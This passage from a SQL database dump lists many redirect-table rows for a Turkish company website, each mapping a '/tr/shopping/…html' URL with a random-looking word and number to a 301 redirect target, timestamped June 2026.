00:00:00',301),(74276,'https://3s-technologies.com.tr/tr/shopping/repousse/1165462740.html',NULL,'https://3s-technologies.com.tr/shopping/repousse/1165462740.html','',1,0,'2026-06-11 06:28:38','0000-00-00 00:00:00',301),(74277,'https://3s-technologies.com.tr/tr/shopping/xeroderma/2542721079.html',NULL,'https://3s-technologies.com.tr/shopping/xeroderma/2542721079.html','',1,0,'2026-06-11 06:28:41','0000-00-00 00:00:00',301),(74278,'https://3s-technologies.com.tr/tr/shopping/venom/3917891237.html',NULL,'https://3s-technologies.com.tr/shopping/venom/3917891237.html','',1,0,'2026-06-11 06:28:43','0000-00-00 00:00:00',301),(74279,'https://3s-technologies.com.tr/tr/shopping/lapped/3246165337.html',NULL,'https://3s-technologies.com.tr/shopping/lapped/3246165337.html','',1,0,'2026-06-11 06:28:47','0000-00-00 00:00:00',301),(74280,'https://3s-technologies.com.tr/tr/shopping/joinhand/3033112545.html',NULL,'https://3s-technologies.com.tr/shopping/joinhand/3033112545.html','',1,0,'2026-06-11 06:28:50','0000-00-00 00:00:00',301),(74281,'https://3s-technologies.com.tr/tr/shopping/plastering/1261923239.html',NULL,'https://3s-technologies.com.tr/shopping/plastering/1261923239.html','',1,0,'2026-06-11 06:28:53','0000-00-00 00:00:00',301),(74282,'https://3s-technologies.com.tr/tr/shopping/avolate/4181606779.html',NULL,'https://3s-technologies.com.tr/shopping/avolate/4181606779.html','',1,0,'2026-06-11 06:28:56','0000-00-00 00:00:00',301),(74283,'https://3s-technologies.com.tr/tr/shopping/bowldery/3270051185.html',NULL,'https://3s-technologies.com.tr/shopping/bowldery/3270051185.html','',1,0,'2026-06-11 06:29:00','0000-00-00 00:00:00',301),(74284,'https://3s-technologies.com.tr/tr/shopping/fleshed/2270636869.html',NULL,'https://3s-technologies.com.tr/shopping/fleshed/2270636869.html','',1,0,'2026-06-11 06:29:02','0000-00-00 00:00:00',301),(74285,'https://3s-technologies.com.tr/tr/shopping/corporify/491120946.html',NULL,'https://3s-technologies.com.tr/shopping/corporify/491120946.html','',1,0,'2026-06-11 06:29:05','0000-00-00 00:00:00',301),(74286,'https://3s-technologies.com.tr/tr/shopping/cavendish/1983376494.html',NULL,'https://3s-technologies.com.tr/shopping/cavendish/1983376494.html','',1,0,'2026-06-11 06:29:08','0000-00-00 00:00:00',301),(74287,'https://3s-technologies.com.tr/tr/shopping/acorned/1485946442.html',NULL,'https://3s-technologies.com.tr/shopping/acorned/1485946442.html','',1,0,'2026-06-11 06:29:11','0000-00-00 00:00:00',301),(74288,'https://3s-technologies.com.tr/tr/shopping/communis/3741799074.html',NULL,'https://3s-technologies.com.tr/shopping/communis/3741799074.html','',1,0,'2026-06-11 06:29:14','0000-00-00 00:00:00',301),(74289,'https://3s-technologies.com.tr/tr/shopping/cryptoprocta/1871926269.html',NULL,'https://3s-technologies.com.tr/shopping/cryptoprocta/1871926269.html','',1,0,'2026-06-11 06:29:17','0000-00-00 00:00:00',301),(74290,'https://3s-technologies.com.tr/tr/shopping/earthboard/201230666.html',NULL,'https://3s-technologies.com.tr/shopping/earthboard/201230666.html','',1,0,'2026-06-11 06:29:20','0000-00-00 00:00:00',301),(74291,'https://3s-technologies.com.tr/tr/shopping/chorion/1935950797.html',NULL,'https://3s-technologies.com.tr/shopping/chorion/1935950797.html','',1,0,'2026-06-11 06:29:23','0000-00-00 00:00:00',301),(74292,'https://3s-technologies.com.tr/tr/shopping/callosum/1572747005.html',NULL,'https://3s-technologies.com.tr/shopping/callosum/1572747005.html','',1,0,'2026-06-11 06:29:26','0000-00-00 00:00:00',301),(74293,'https://3s-technologies.com.tr/tr/shopping/tatar/2793464306.html',NULL,'https://3s-technologies.com.tr/shopping/tatar/2793464306.html','',1,0,'2026-06-11 06:29:29','0000-00-00 00:00:00',301),(74294,'https://3s-technologies.com.tr/tr/shopping/quadruped/2347301032.html',NULL,'https://3s-technologies.com.tr/shopping/quadruped/2347301032.html','',1,0,'2026-06-11 06:29:32','0000-00-00 00:00:00',301),(74295,'https://3s-technologies.com.tr/tr/shopping/dryplate/142644638.html',NULL,'https://3s-technologies.com.tr/shopping/dryplate/142644638.html','',1,0,'2026-06-11 06:29:35','0000-00-00 00:00:00',301),(74296,'https://3s-technologies.com.tr/tr/shopping/weleful/1768512948.html',NULL,'https://3s-technologies.com.tr/shopping/weleful/1768512948.html','',1,0,'2026-06-11 06:29:38','0000-00-00 00:00:00',301),(74297,'https://3s-technologies.com.tr/tr/shopping/repletion/1955948744.html',NULL,'https://3s-technologies.com.tr/shopping/repletion/1955948744.html','',1,0,'2026-06-11 06:29:41','0000-00-00 00:00:00',301),(74298,'https://3s-technologies.com.tr/tr/shopping/understrapper/2994218313.html',NULL,'https://3s-technologies.com.tr/shopping/understrapper/2994218313.html','',1,0,'2026-06-11 06:29:44','0000-00-00 00:00:00',301),(74299,'https://3s-technologies.com.tr/tr/shopping/bally/1276189081.html',NULL,'https://3s-technologies.com.tr/shopping/bally/1276189081.html','',1,0,'2026-06-11 06:29:47','0000-00-00 00:00:00',301),(74300,'https://3s-technologies.com.tr/tr/shopping/summersault/2080510593.html',NULL,'https://3s-technologies.com.tr/shopping/summersault/2080510593.html','',1,0,'2026-06-11 06:29:50','0000-00-00 00:00:00',301),(74301,'https://3s-technologies.com.tr/tr/shopping/budger/1745800633.html',NULL,'https://3s-technologies.com.tr/shopping/budger/1745800633.html','',1,0,'2026-06-11 06:29:53','0000-00-00 00:00:00',301),(74302,'https://3s-technologies.com.tr/tr/shopping/sanctify/1738833071.html',NULL,'https://3s-technologies.com.tr/shopping/sanctify/1738833071.html','',1,0,'2026-06-11 06:29:56','0000-00-00 00:00:00',301),(74303,'https://3s-technologies.com.tr/tr/shopping/gauding/1570322791.html',NULL,'https://3s-technologies.com.tr/shopping/gauding/1570322791.html','',1,0,'2026-06-11 06:29:59','0000-00-00 00:00:00',301),(74304,'https://3s-technologies.com.tr/tr/shopping/inspecting/1240287021.html',NULL,'https://3s-technologies.com.tr/shopping/inspecting/1240287021.html','',1,0,'2026-06-11 06:30:02','0000-00-00 00:00:00',301),(74305,'https://3s-technologies.com.tr/tr/shopping/doura/2746298201.html',NULL,'https://3s-technologies.com.tr/shopping/doura/2746298201.html','',1,0,'2026-06-11 06:30:07','0000-00-00 00:00:00',301),(74306,'https://3s-technologies.com.tr/tr/shopping/radioscopy/4056775951.html',NULL,'https://3s-technologies.com.tr/shopping/radioscopy/4056775951.html','',1,0,'2026-06-11 06:30:10','0000-00-00 00:00:00',301),(74307,'https://3s-technologies.com.tr/tr/shopping/vanellus/4254284427.html',NULL,'https://3s-technologies.com.tr/shopping/vanellus/4254284427.html','',1,0,'2026-06-11 06:30:13','0000-00-00 00:00:00',301),(74308,'https://3s-technologies.com.tr/tr/shopping/batsmen/2249058500.html',NULL,'https://3s-technologies.com.tr/shopping/batsmen/2249058500.html','',1,0,'2026-06-11 06:30:16','0000-00-00 00:00:00',301),(74309,'https://3s-technologies.com.tr/tr/shopping/bleakness/736295373.html',NULL,'https://3s-technologies.com.tr/shopping/bleakness/736295373.html','',1,0,'2026-06-11 06:30:19','0000-00-00 00:00:00',301),(74310,'https://3s-technologies.com.tr/tr/shopping/pinnet/3948118215.html',NULL,'https://3s-technologies.com.tr/shopping/pinnet/3948118215.html','',1,0,'2026-06-11 06:30:24','0000-00-00 00:00:00',301),(74311,'https://3s-technologies.com.tr/tr/shopping/triphylite/3041825829.html',NULL,'https://3s-technologies.com.tr/shopping/triphylite/3041825829.html','',1,0,'2026-06-11 06:30:29','0000-00-00 00:00:00',301),(74312,'https://3s-technologies.com.tr/tr/shopping/saugh/430103107.html',NULL,'https://3s-technologies.com.tr/shopping/saugh/430103107.html','',1,0,'2026-06-11 06:30:34','0000-00-00 00:00:00',301),(74313,'https://3s-technologies.com.tr/tr/shopping/effluxion/146359088.html',NULL,'https://3s-technologies.com.tr/shopping/effluxion/146359088.html','',1,0,'2026-06-11 06:30:37','0000-00-00 00:00:00',301),(74314,'https://3s-technologies.com.tr/tr/shopping/quirl/706829680.html',NULL,'https://3s-technologies.com.tr/shopping/quirl/706829680.html','',1,0,'2026-06-11 06:30:40','0000-00-00 00:00:00',301),(74315,'https://3s-technologies.com.tr/tr/shopping/tripartient/3762720378.html',NULL,'https://3s-technologies.com.tr/shopping/tripartient/3762720378.html','',1,0,'2026-06-11 06:30:43','0000-00-00 00:00:00',301),(74316,'https://3s-technologies.com.tr/tr/shopping/snoozed/871410388.html',NULL,'https://3s-technologies.com.tr/shopping/snoozed/871410388.html','',1,0,'2026-06-11 06:30:46','0000-00-00 00:00:00',301),(74317,'https://3s-technologies.com.tr/tr/shopping/compassion/1050717200.html',NULL,'https://3s-technologies.com.tr/shopping/compassion/1050717200.html','',1,0,'2026-06-11 06:30:49','0000-00-00 00:00:00',301),(74318,'https://3s-technologies.com.tr/tr/shopping/drossy/414489164.html',NULL,'https://3s-technologies.com.tr/shopping/drossy/414489164.html','',1,0,'2026-06-11 06:30:52','0000-00-00 00:00:00',301),(74319,'https://3s-technologies.com.tr/tr/shopping/aortic/107338096.html',NULL,'https://3s-technologies.com.tr/shopping/aortic/107338096.html','',1,0,'2026-06-11 06:30:55','0000-00-00 00:00:00',301),(74320,'https://3s-technologies.com.tr/tr/shopping/littlest/2766942375.html',NULL,'https://3s-technologies.com.tr/shopping/littlest/2766942375.html','',1,0,'2026-06-11 06:30:58','0000-00-00 00:00:00',301),(74321,'https://3s-technologies.com.tr/tr/shopping/benign/4005759349.html',NULL,'https://3s-technologies.com.tr/shopping/benign/4005759349.html','',1,0,'2026-06-11 06:31:01','0000-00-00 00:00:00',301),(74322,'https://3s-technologies.com.tr/tr/shopping/cornea/583788396.html',NULL,'https://3s-technologies.com.tr/shopping/cornea/583788396.html','',1,0,'2026-06-11 06:31:05','0000-00-00 00:00:00',301),(74323,'https://3s-technologies.com.tr/tr/shopping/comfy/1430618988.html',NULL,'https://3s-technologies.com.tr/shopping/comfy/1430618988.html','',1,0,'2026-06-11 06:31:08','0000-00-00 00:00:00',301),(74324,'https://3s-technologies.com.tr/tr/shopping/tentmaker/2303778821.html',NULL,'https://3s-technologies.com.tr/shopping/tentmaker/2303778821.html','',1,0,'2026-06-11 06:31:11','0000-00-00 00:00:00',301),(74325,'https://3s-technologies.com.tr/tr/shopping/thermotics/2702690636.html',NULL,'https://3s-technologies.com.tr/shopping/thermotics/2702690636.html','',1,0,'2026-06-11 06:31:14','0000-00-00 00:00:00',301),(74326,'https://3s-technologies.com.tr/tr/shopping/dactylifera/957355809.html',NULL,'https://3s-technologies.com.tr/shopping/dactylifera/957355809.html','',1,0,'2026-06-11 06:31:17','0000-00-00 00:00:00',301),(74327,'https://3s-technologies.com.tr/tr/shopping/syncline/3353781323.html',NULL,'https://3s-technologies.com.tr/shopping/syncline/3353781323.html','',1,0,'2026-06-11 06:31:20','0000-00-00 00:00:00',301),(74328,'https://3s-technologies.com.tr/tr/shopping/donator/1416295281.html',NULL,'https://3s-technologies.com.tr/shopping/donator/1416295281.html','',1,0,'2026-06-11 06:31:23','0000-00-00 00:00:00',301),(74329,'https://3s-technologies.com.tr/tr/shopping/ninthly/3428462715.html',NULL,'https://3s-technologies.com.tr/shopping/ninthly/3428462715.html','',1,0,'2026-06-11 06:31:26','0000-00-00 00:00:00',301),(74330,'https://3s-technologies.com.tr/tr/shopping/watteau/3756862907.html',NULL,'https://3s-technologies.com.tr/shopping/watteau/3756862907.html','',1,0,'2026-06-11 06:31:29','0000-00-00 00:00:00',301),(74331,'https://3s-technologies.com.tr/tr/shopping/latten/1458527224.html',NULL,'https://3s-technologies.com.tr/shopping/latten/1458527224.html','',1,0,'2026-06-11 06:31:32','0000-00-00 00:00:00',301),(74332,'https://3s-technologies.com.tr/tr/shopping/ragwort/762825804.html',NULL,'https://3s-technologies.com.tr/shopping/ragwort/762825804.html','',1,0,'2026-06-11 06:31:35','0000-00-00 00:00:00',301),(74333,'https://3s-technologies.com.tr/tr/shopping/baldface/1059414258.html',NULL,'https://3s-technologies.com.tr/shopping/baldface/1059414258.html','',1,0,'2026-06-11 06:31:38','0000-00-00 00:00:00',301),(74334,'https://3s-technologies.com.tr/tr/shopping/soppy/3107225995.html',NULL,'https://3s-technologies.com.tr/shopping/soppy/3107225995.html','',1,0,'2026-06-11 06:31:41','0000-00-00 00:00:00',301),(74335,'https://3s-technologies.com.tr/tr/shopping/posttertiary/2833053356.html',NULL,'https://3s-technologies.com.tr/shopping/posttertiary/2833053356.html','',1,0,'2026-06-11 06:31:44','0000-00-00 00:00:00',301),(74336,'https://3s-technologies.com.tr/tr/shopping/sleighing/4143298594.html',NULL,'https://3s-technologies.com.tr/shopping/sleighing/4143298594.html','',1,0,'2026-06-11 06:31:47','0000-00-00 00:00:00',301),(74337,'https://3s-technologies.com.tr/tr/shopping/outflew/3736738297.html',NULL,'https://3s-technologies.com.tr/shopping/outflew/3736738297.html','',1,0,'2026-06-11 06:31:50','0000-00-00 00:00:00',301),(74338,'https://3s-technologies.com.tr/tr/shopping/mountance/3300121812.html',NULL,'https://3s-technologies.com.tr/shopping/mountance/3300121812.html','',1,0,'2026-06-11 06:31:53','0000-00-00 00:00:00',301),(74339,'https://3s-technologies.com.tr/tr/shopping/sheriffry/3752352272.html',NULL,'https://3s-technologies.com.tr/shopping/sheriffry/3752352272.html','',1,0,'2026-06-11 06:31:56','0000-00-00 00:00:00',301),(74340,'https://3s-technologies.com.tr/tr/shopping/polytyped/1502694363.html',NULL,'https://3s-technologies.com.tr/shopping/polytyped/1502694363.html','',1,0,'2026-06-11 06:31:59','0000-00-00 00:00:00',301),(74341,'https://3s-technologies.com.tr/tr/shopping/importunator/737507472.html',NULL,'https://3s-technologies.com.tr/shopping/importunator/737507472.html','',1,0,'2026-06-11 06:32:02','0000-00-00 00:00:00',301),(74342,'https://3s-technologies.com.tr/tr/shopping/memories/4042615751.html',NULL,'https://3s-technologies.com.tr/shopping/memories/4042615751.html','',1,0,'2026-06-11 06:32:05','0000-00-00 00:00:00',301),(74343,'https://3s-technologies.com.tr/tr/shopping/ecumenical/272535369.html',NULL,'https://3s-technologies.com.tr/shopping/ecumenical/272535369.html','',1,0,'2026-06-11 06:32:08','0000-00-00 00:00:00',301),(74344,'https://3s-technologies.com.tr/tr/shopping/vortical/3400979793.html',NULL,'https://3s-technologies.com.tr/shopping/vortical/3400979793.html','',1,0,'2026-06-11 06:32:13','0000-00-00 00:00:00',301),(74345,'https://3s-technologies.com.tr/tr/shopping/symphytism/2669610183.html',NULL,'https://3s-technologies.com.tr/shopping/symphytism/2669610183.html','',1,0,'2026-06-11 06:32:15','0000-00-00 00:00:00',301),(74346,'https://3s-technologies.com.tr/tr/shopping/tasting/3211687860.html',NULL,'https://3s-technologies.com.tr/shopping/tasting/3211687860.html','',1,0,'2026-06-11 06:32:18','0000-00-00 00:00:00',301),(74347,'https://3s-technologies.com.tr/tr/shopping/hexahydroxycyclohexane/831101359.html',NULL,'https://3s-technologies.com.tr/shopping/hexahydroxycyclohexane/831101359.html','',1,0,'2026-06-11 06:32:21','0000-00-00 00:00:00',301),(74348,'https://3s-technologies.com.tr/tr/shopping/micrantha/2365134405.html',NULL,'https://3s-technologies.com.tr/shopping/micrantha/2365134405.html','',1,0,'2026-06-11 06:32:24','0000-00-00 00:00:00',301),(74349,'https://3s-technologies.com.tr/tr/shopping/forsythia/998539176.html',NULL,'https://3s-technologies.com.tr/shopping/forsythia/998539176.html','',1,0,'2026-06-11 06:32:27','0000-00-00 00:00:00',301),(74350,'https://3s-technologies.com.tr/tr/shopping/sublimate/3792878606.html',NULL,'https://3s-technologies.com.tr/shopping/sublimate/3792878606.html','',1,0,'2026-06-11 06:32:30','0000-00-00 00:00:00',301),(74351,'https://3s-technologies.com.tr/tr/shopping/recallable/1687740515.html',NULL,'https://3s-technologies.com.tr/shopping/recallable/1687740515.html','',1,0,'2026-06-11 06:32:33','0000-00-00 00:00:00',301),(74352,'https://3s-technologies.com.tr/tr/shopping/paternal/3719383259.html',NULL,'https://3s-technologies.com.tr/shopping/paternal/3719383259.html','',1,0,'2026-06-11 06:32:35','0000-00-00 00:00:00',301),(74353,'https://3s-technologies.com.tr/tr/shopping/scalper/1900394063.html',NULL,'https://3s-technologies.com.tr/shopping/scalper/1900394063.html','',1,0,'2026-06-11 06:32:39','0000-00-00 00:00:00',301),(74354,'https://3s-technologies.com.tr/tr/shopping/intangibility/219536028.html',NULL,'https://3s-technologies.com.tr/shopping/intangibility/219536028.html','',1,0,'2026-06-11 06:32:42','0000-00-00 00:00:00',301),(74355,'https://3s-technologies.com.tr/tr/shopping/aeschynomene/493545128.html',NULL,'https://3s-technologies.com.tr/shopping/aeschynomene/493545128.html','',1,0,'2026-06-11 06:32:44','0000-00-00 00:00:00',301),(74356,'https://3s-technologies.com.tr/tr/shopping/bouncer/1786984032.html',NULL,'https://3s-technologies.com.tr/shopping/bouncer/1786984032.html','',1,0,'2026-06-11 06:32:48','0000-00-00 00:00:00',301),(74357,'https://3s-technologies.com.tr/tr/shopping/defensibility/1706990771.html',NULL,'https://3s-technologies.com.tr/shopping/defensibility/1706990771.html','',1,0,'2026-06-11 06:32:51','0000-00-00 00:00:00',301),(74358,'https://3s-technologies.com.tr/tr/shopping/mercy/3551467091.html',NULL,'https://3s-technologies.com.tr/shopping/mercy/3551467091.html','',1,0,'2026-06-11 06:32:55','0000-00-00 00:00:00',301),(74359,'https://3s-technologies.com.tr/tr/shopping/holstein/3514861781.html',NULL,'https://3s-technologies.com.tr/shopping/holstein/3514861781.html','',1,0,'2026-06-11 06:32:57','0000-00-00 00:00:00',301),(74360,'https://3s-technologies.com.tr/tr/shopping/letalone/3037237057.html',NULL,'https://3s-technologies.com.tr/shopping/letalone/3037237057.html','',1,0,'2026-06-11 06:33:00','0000-00-00 00:00:00',301),(74361,'https://3s-technologies.com.tr/tr/shopping/polary/336691055.html',NULL,'https://3s-technologies.com.tr/shopping/polary/336691055.html','',1,0,'2026-06-11 06:33:03','0000-00-00 00:00:00',301),(74362,'https://3s-technologies.com.tr/tr/shopping/nebulosity/3247943820.html',NULL,'https://3s-technologies.com.tr/shopping/nebulosity/3247943820.html','',1,0,'2026-06-11 06:33:06','0000-00-00 00:00:00',301),(74363,'https://3s-technologies.com.tr/tr/shopping/paleolae/3561153548.html',NULL,'https://3s-technologies.com.tr/shopping/paleolae/3561153548.html','',1,0,'2026-06-11 06:33:09','0000-00-00 00:00:00',301),(74364,'https://3s-technologies.com.tr/tr/shopping/nearly/1718708477.html',NULL,'https://3s-technologies.com.tr/shopping/nearly/1718708477.html','',1,0,'2026-06-11 06:33:12','0000-00-00 00:00:00',301),(74365,'https://3s-technologies.com.tr/tr/shopping/estophed/1621970397.html',NULL,'https://3s-technologies.com.tr/shopping/estophed/1621970397.html','',1,0,'2026-06-11 06:33:15','0000-00-00 00:00:00',301),(74366,'https://3s-technologies.com.tr/tr/shopping/relief/1450639916.html',NULL,'https://3s-technologies.com.tr/shopping/relief/1450639916.html','',1,0,'2026-06-11 06:33:18','0000-00-00 00:00:00',301),(74367,'https://3s-technologies.com.tr/tr/shopping/goslow/896565213.html',NULL,'https://3s-technologies.com.tr/shopping/goslow/896565213.html','',1,0,'2026-06-11 06:33:21','0000-00-00 00:00:00',301),(74368,'https://3s-technologies.com.tr/tr/shopping/flookan/3187494058.html',NULL,'https://3s-technologies.com.tr/shopping/flookan/3187494058.html','',1,0,'2026-06-11 06:33:24','0000-00-00 00:00:00',301),(74369,'https://3s-technologies.com.tr/tr/shopping/verities/4067619287.html',NULL,'https://3s-technologies.com.tr/shopping/verities/4067619287.html','',1,0,'2026-06-11 06:33:27','0000-00-00 00:00:00',301),(74370,'https://3s-technologies.com.tr/tr/shopping/sailor/936536497.html',NULL,'https://3s-technologies.com.tr/shopping/sailor/936536497.html','',1,0,'2026-06-11 06:33:30','0000-00-00 00:00:00',301),(74371,'https://3s-technologies.com.tr/tr/shopping/anethol/2534092787.html',NULL,'https://3s-technologies.com.tr/shopping/anethol/2534092787.html','',1,0,'2026-06-11 06:33:33','0000-00-00 00:00:00',301),(74372,'https://3s-technologies.com.tr/tr/shopping/impanator/820885922.html',NULL,'https://3s-technologies.com.tr/shopping/impanator/820885922.html','',1,0,'2026-06-11 06:33:36','0000-00-00 00:00:00',301),(74373,'https://3s-technologies.com.tr/tr/shopping/phrenologist/166483682.html',NULL,'https://3s-technologies.com.tr/shopping/phrenologist/166483682.html','',1,0,'2026-06-11 06:33:39','0000-00-00 00:00:00',301),(74374,'https://3s-technologies.com.tr/tr/shopping/polypary/2733495043.html',NULL,'https://3s-technologies.com.tr/shopping/polypary/2733495043.html','',1,0,'2026-06-11 06:33:42','0000-00-00 00:00:00',301),(74375,'https://3s-technologies.com.tr/tr/shopping/mierkat/842993271.html',NULL,'https://3s-technologies.com.tr/shopping/mierkat/842993271.html','',1,0,'2026-06-11 06:33:45','0000-00-00 00:00:00',301),(74376,'https://3s-technologies.com.tr/tr/shopping/lounge/3177490506.html',NULL,'https://3s-technologies.com.tr/shopping/lounge/3177490506.html','',1,0,'2026-06-11 06:33:48','0000-00-00 00:00:00',301),(74377,'https://3s-technologies.com.tr/tr/shopping/acetosa/3925067762.html',NULL,'https://3s-technologies.com.tr/shopping/acetosa/3925067762.html','',1,0,'2026-06-11 06:33:51','0000-00-00 00:00:00',301),(74378,'https://3s-technologies.com.tr/tr/shopping/perspirative/3408850875.html',NULL,'https://3s-technologies.com.tr/shopping/perspirative/3408850875.html','',1,0,'2026-06-11 06:33:54','0000-00-00 00:00:00',301),(74379,'https://3s-technologies.com.tr/tr/shopping/unstep/419936048.html',NULL,'https://3s-technologies.com.tr/shopping/unstep/419936048.html','',1,0,'2026-06-11 06:33:57','0000-00-00 00:00:00',301),(74380,'https://3s-technologies.com.tr/tr/shopping/recrystallize/2718997098.html',NULL,'https://3s-technologies.com.tr/shopping/recrystallize/2718997098.html','',1,0,'2026-06-11 06:34:06','0000-00-00 00:00:00',301),(74381,'https://3s-technologies.com.tr/tr/shopping/crucify/2633342634.html',NULL,'https://3s-technologies.com.tr/shopping/crucify/2633342634.html','',1,0,'2026-06-11 06:34:10','0000-00-00 00:00:00',301),(74382,'https://3s-technologies.com.tr/tr/shopping/microsthenic/1492959428.html',NULL,'https://3s-technologies.com.tr/shopping/microsthenic/1492959428.html','',1,0,'2026-06-11 06:34:13','0000-00-00 00:00:00',301),(74383,'https://3s-technologies.com.tr/tr/shopping/chirographer/3399767694.html',NULL,'https://3s-technologies.com.tr/shopping/chirographer/3399767694.html','',1,0,'2026-06-11 06:34:16','0000-00-00 00:00:00',301),(74384,'https://3s-technologies.com.tr/tr/shopping/roomed/2363922322.html',NULL,'https://3s-technologies.com.tr/shopping/roomed/2363922322.html','',1,0,'2026-06-11 06:34:19','0000-00-00 00:00:00',301),(74385,'https://3s-technologies.com.tr/tr/shopping/oakum/1464963607.html',NULL,'https://3s-technologies.com.tr/shopping/oakum/1464963607.html','',1,0,'2026-06-11 06:34:22','0000-00-00 00:00:00',301),(74386,'https://3s-technologies.com.tr/tr/shopping/epitomator/824426118.html',NULL,'https://3s-technologies.com.tr/shopping/epitomator/824426118.html','',1,0,'2026-06-11 06:34:25','0000-00-00 00:00:00',301),(74387,'https://3s-technologies.com.tr/tr/shopping/upholdster/2667445593.html',NULL,'https://3s-technologies.com.tr/shopping/upholdster/2667445593.html','',1,0,'2026-06-11 06:34:28','0000-00-00 00:00:00',301),(74388,'https://3s-technologies.com.tr/tr/shopping/apocalyptical/580489844.html',NULL,'https://3s-technologies.com.tr/shopping/apocalyptical/580489844.html','',1,0,'2026-06-11 06:34:31','0000-00-00 00:00:00',301),(74389,'https://3s-technologies.com.tr/tr/shopping/bodged/625932786.html',NULL,'https://3s-technologies.com.tr/shopping/bodged/625932786.html','',1,0,'2026-06-11 06:34:34','0000-00-00 00:00:00',301),(74390,'https://3s-technologies.com.tr/tr/shopping/cavalier/1928302315.html',NULL,'https://3s-technologies.com.tr/shopping/cavalier/1928302315.html','',1,0,'2026-06-11 06:34:37','0000-00-00 00:00:00',301),(74391,'https://3s-technologies.com.tr/tr/shopping/aconite/271323270.html',NULL,'https://3s-technologies.com.tr/shopping/aconite/271323270.html','',1,0,'2026-06-11 06:34:40','0000-00-00 00:00:00',301),(74392,'https://3s-technologies.com.tr/tr/shopping/fustet/3110602684.html',NULL,'https://3s-technologies.com.tr/shopping/fustet/3110602684.html','',1,0,'2026-06-11 06:34:43','0000-00-00 00:00:00',301),(74393,'https://3s-technologies.com.tr/tr/shopping/blastocyst/701934496.html',NULL,'https://3s-technologies.com.tr/shopping/blastocyst/701934496.html','',1,0,'2026-06-11 06:34:50','0000-00-00 00:00:00',301),(74394,'https://3s-technologies.com.tr/tr/shopping/runway/2870128453.html',NULL,'https://3s-technologies.com.tr/shopping/runway/2870128453.html','',1,0,'2026-06-11 06:34:54','0000-00-00 00:00:00',301),(74395,'https://3s-technologies.com.tr/tr/shopping/wende/2435834174.html',NULL,'https://3s-technologies.com.tr/shopping/wende/2435834174.html','',1,0,'2026-06-11 06:34:57','0000-00-00 00:00:00',301),(74396,'https://3s-technologies.com.tr/tr/shopping/fishamberfish/2941055433.html',NULL,'https://3s-technologies.com.tr/shopping/fishamberfish/2941055433.html','',1,0,'2026-06-11 06:35:00','0000-00-00 00:00:00',301),(74397,'https://3s-technologies.com.tr/tr/shopping/forbathe/3510737269.html',NULL,'https://3s-technologies.com.tr/shopping/forbathe/3510737269.html','',1,0,'2026-06-11 06:35:03','0000-00-00 00:00:00',301),(74398,'https://3s-technologies.com.tr/tr/shopping/stowing/1433043186.html',NULL,'https://3s-technologies.com.tr/shopping/stowing/1433043186.html','',1,0,'2026-06-11 06:35:06','0000-00-00 00:00:00',301),(74399,'https://3s-technologies.com.tr/tr/shopping/awkward/865832101.html',NULL,'https://3s-technologies.com.tr/shopping/awkward/865832101.html','',1,0,'2026-06-11 06:35:09','0000-00-00 00:00:00',301),(74400,'https://3s-technologies.com.tr/tr/shopping/orgillous/4049274750.html',NULL,'https://3s-technologies.com.tr/shopping/orgillous/4049274750.html','',1,0,'2026-06-11 06:35:12','0000-00-00 00:00:00',301),(74401,'https://3s-technologies.com.tr/tr/shopping/immedicable/1878468124.html',NULL,'https://3s-technologies.com.tr/shopping/immedicable/1878468124.html','',1,0,'2026-06-11 06:35:15','0000-00-00 00:00:00',301),(74402,'https://3s-technologies.com.tr/tr/shopping/craponius/2252598712.html',NULL,'https://3s-technologies.com.tr/shopping/craponius/2252598712.html','',1,0,'2026-06-11 06:35:18','0000-00-00 00:00:00',301),(74403,'https://3s-technologies.com.tr/tr/shopping/boltel/3842910320.html',NULL,'https://3s-technologies.com.tr/shopping/boltel/3842910320.html','',1,0,'2026-06-11 06:35:21','0000-00-00 00:00:00',301),(74404,'https://3s-technologies.com.tr/tr/shopping/olympic/3574370612.html',NULL,'https://3s-technologies.com.tr/shopping/olympic/3574370612.html','',1,0,'2026-06-11 06:35:24','0000-00-00 00:00:00',301),(74405,'https://3s-technologies.com.tr/tr/shopping/groat/2794041735.html',NULL,'https://3s-technologies.com.tr/shopping/groat/2794041735.html','',1,0,'2026-06-11 06:35:27','0000-00-00 00:00:00',301),(74406,'https://3s-technologies.com.tr/tr/shopping/cringer/3733679445.html',NULL,'https://3s-technologies.com.tr/shopping/cringer/3733679445.html','',1,0,'2026-06-11 06:35:30','0000-00-00 00:00:00',301),(74407,'https://3s-technologies.com.tr/tr/shopping/hypotarsus/803211010.html',NULL,'https://3s-technologies.com.tr/shopping/hypotarsus/803211010.html','',1,0,'2026-06-11 06:35:33','0000-00-00 00:00:00',301),(74408,'https://3s-technologies.com.tr/tr/shopping/grossularite/72522314.html',NULL,'https://3s-technologies.com.tr/shopping/grossularite/72522314.html','',1,0,'2026-06-11 06:35:38','0000-00-00 00:00:00',301),(74409,'https://3s-technologies.com.tr/tr/shopping/privado/2790665046.html',NULL,'https://3s-technologies.com.tr/shopping/privado/2790665046.html','',1,0,'2026-06-11 06:35:42','0000-00-00 00:00:00',301),(74410,'https://3s-technologies.com.tr/tr/shopping/parapophysical/2453824708.html',NULL,'https://3s-technologies.com.tr/shopping/parapophysical/2453824708.html','',1,0,'2026-06-11 06:35:45','0000-00-00 00:00:00',301),(74411,'https://3s-technologies.com.tr/tr/shopping/amputate/1808870355.html',NULL,'https://3s-technologies.com.tr/shopping/amputate/1808870355.html','',1,0,'2026-06-11 06:35:48','0000-00-00 00:00:00',301),(74412,'https://3s-technologies.com.tr/tr/shopping/manageably/2228791033.html',NULL,'https://3s-technologies.com.tr/shopping/manageably/2228791033.html','',1,0,'2026-06-11 06:35:51','0000-00-00 00:00:00',301),(74413,'https://3s-technologies.com.tr/tr/shopping/birdwatch/857961035.html',NULL,'https://3s-technologies.com.tr/shopping/birdwatch/857961035.html','',1,0,'2026-06-11 06:35:54','0000-00-00 00:00:00',301),(74414,'https://3s-technologies.com.tr/tr/shopping/phantasmagoric/3320632545.html',NULL,'https://3s-technologies.com.tr/shopping/phantasmagoric/3320632545.html','',1,0,'2026-06-11 06:35:57','0000-00-00 00:00:00',301),(74415,'https://3s-technologies.com.tr/tr/shopping/poculiform/2775734206.html',NULL,'https://3s-technologies.com.tr/shopping/poculiform/2775734206.html','',1,0,'2026-06-11 06:36:00','0000-00-00 00:00:00',301),(74416,'https://3s-technologies.com.tr/tr/shopping/strutted/4025559251.html',NULL,'https://3s-technologies.com.tr/shopping/strutted/4025559251.html','',1,0,'2026-06-11 06:36:03','0000-00-00 00:00:00',301),(74417,'https://3s-technologies.com.tr/tr/shopping/exeat/3563963869.html',NULL,'https://3s-technologies.com.tr/shopping/exeat/3563963869.html','',1,0,'2026-06-11 